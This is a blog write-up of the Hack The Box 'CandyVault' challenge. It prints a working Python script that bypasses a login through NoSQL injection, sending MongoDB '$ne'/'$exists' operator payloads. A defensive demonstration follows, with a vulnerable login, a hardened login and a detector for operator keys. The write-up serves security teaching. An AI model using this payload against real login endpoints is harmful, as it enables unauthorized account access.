HackTheBox CandyVault Challenge

Explore the basics of cybersecurity in the CandyVault Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/624

Description

The malevolent spirits have concealed all the Halloween treats within their secret vault, and it’s imperative that you decipher its enigmatic seal to reclaim the candy before the spooky night arrives.

Exploitation

#!/usr/bin/python3
# Exploit script from the write-up: sends MongoDB operator objects to the
# /login endpoint and prints whatever page comes back once the login form is gone.
import sys

import requests
from requests.exceptions import ConnectionError


def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"


def attempt_login(payload):
    # Retry a few times in case the challenge instance is still coming up.
    for _ in range(3):
        try:
            response = session.post(login_url, headers=headers, json=payload, allow_redirects=False)
            if response.is_redirect:
                # Follow the redirect by hand so the session cookie set on login is reused.
                final_url = response.headers.get("Location", "")
                if final_url.startswith("/"):
                    final_url = base_url + final_url
                response = session.get(final_url, headers=headers)
                return response, final_url
            return response, None
        except ConnectionError:
            pass
    return None, None


def attack():
    for payload in payloads:
        response, final_url = attempt_login(payload)
        # The login page always carries this prompt; any other body means we are past it.
        if response and "Log-in to open the doors to candy vault!" not in response.text:
            print(response.text)
            return


base_url = get_base_url()
login_url = f"{base_url}/login"
headers = {"Content-Type": "application/json", "User-Agent": "Mozilla/5.0"}
session = requests.Session()
# Operator objects instead of strings: {"$ne": None} matches any email,
# {"$exists": True} matches any stored password.
payloads = [{"email": {"$ne": None}, "password": {"$exists": True}}]
attack()

Summary

CandyVault is a very-easy-level challenge on Hack The Box that exploits a NoSQL injection vulnerability in the login functionality. By crafting various payloads targeting the email and password fields, the script attempts to bypass authentication using MongoDB query operators. Successful payloads allow access to restricted areas, exposing the flag. This challenge highlights the risks of unsanitized inputs and weak database query protections in NoSQL applications.
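To make the root cause concrete from the defender's side, here is an added example that is not part of the write-up or the challenge's own code. It uses a constructed in-memory stand-in for a MongoDB collection (only equality, $ne and $exists are implemented, enough to mirror the payload above), a login function that passes the decoded JSON straight into the query, a hardened variant that accepts only plain strings, and a small helper that flags request bodies carrying operator keys so they can be logged or rejected at the edge. The user records and their plaintext passwords are constructed sample data; a real application would compare password hashes.

```python
"""Added illustration of the CandyVault bug class (not the challenge's code).

A constructed, minimal subset of MongoDB query matching is used in place of
pymongo so the example runs offline and shows why an operator object in the
request body matches records it should not.
"""
from typing import Any, Optional

# Constructed sample collection; values are placeholders, not from the challenge.
USERS = [
    {"email": "admin@candyvault.example", "password": "placeholder-admin-pass"},
    {"email": "guest@candyvault.example", "password": "guest"},
]


def _field_matches(value: Any, present: bool, condition: Any) -> bool:
    """Match one document field against one query condition.

    Mirrors MongoDB semantics for the two operators the exploit relies on:
    $ne matches when the field differs from the argument (or is absent),
    $exists matches on presence/absence of the field.
    """
    if isinstance(condition, dict):
        for op, arg in condition.items():
            if op == "$ne":
                if present and value == arg:
                    return False
            elif op == "$exists":
                if present != bool(arg):
                    return False
            else:
                raise ValueError(f"unsupported operator in this stand-in: {op}")
        return True
    # Plain value: strict equality, as a string login credential should be.
    return present and value == condition


def find_one(collection: list, query: dict) -> Optional[dict]:
    """Return the first document matching every key of the query, like findOne."""
    for doc in collection:
        if all(_field_matches(doc.get(k), k in doc, cond) for k, cond in query.items()):
            return doc
    return None


def vulnerable_login(body: dict) -> Optional[dict]:
    """Bug: whatever JSON the client sent is used as the query value unchanged,
    so a dict such as {"$ne": None} becomes a query operator."""
    return find_one(USERS, {"email": body.get("email"), "password": body.get("password")})


def hardened_login(body: dict) -> Optional[dict]:
    """Fix: credentials must be plain strings; anything else is refused before
    it reaches the database, so operator objects can never form a query."""
    email, password = body.get("email"), body.get("password")
    if not isinstance(email, str) or not isinstance(password, str):
        return None
    return find_one(USERS, {"email": email, "password": password})


def has_operator_keys(value: Any) -> bool:
    """Detection helper: True if any nested object key begins with '$'.

    Useful as a WAF/middleware rule or for alerting on login request bodies."""
    if isinstance(value, dict):
        return any(k.startswith("$") or has_operator_keys(v) for k, v in value.items())
    if isinstance(value, list):
        return any(has_operator_keys(v) for v in value)
    return False


if __name__ == "__main__":
    # The write-up's payload against both implementations.
    injected = {"email": {"$ne": None}, "password": {"$exists": True}}
    print("vulnerable:", vulnerable_login(injected))
    print("hardened:  ", hardened_login(injected))
    print("flagged:   ", has_operator_keys(injected))
```

The type check is the minimal fix; in production the same effect is usually achieved with schema validation on the request body (for example, declaring both fields as strings) combined with a driver call that never splices client data into query operators.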

This post is licensed under CC BY 4.0 by the author.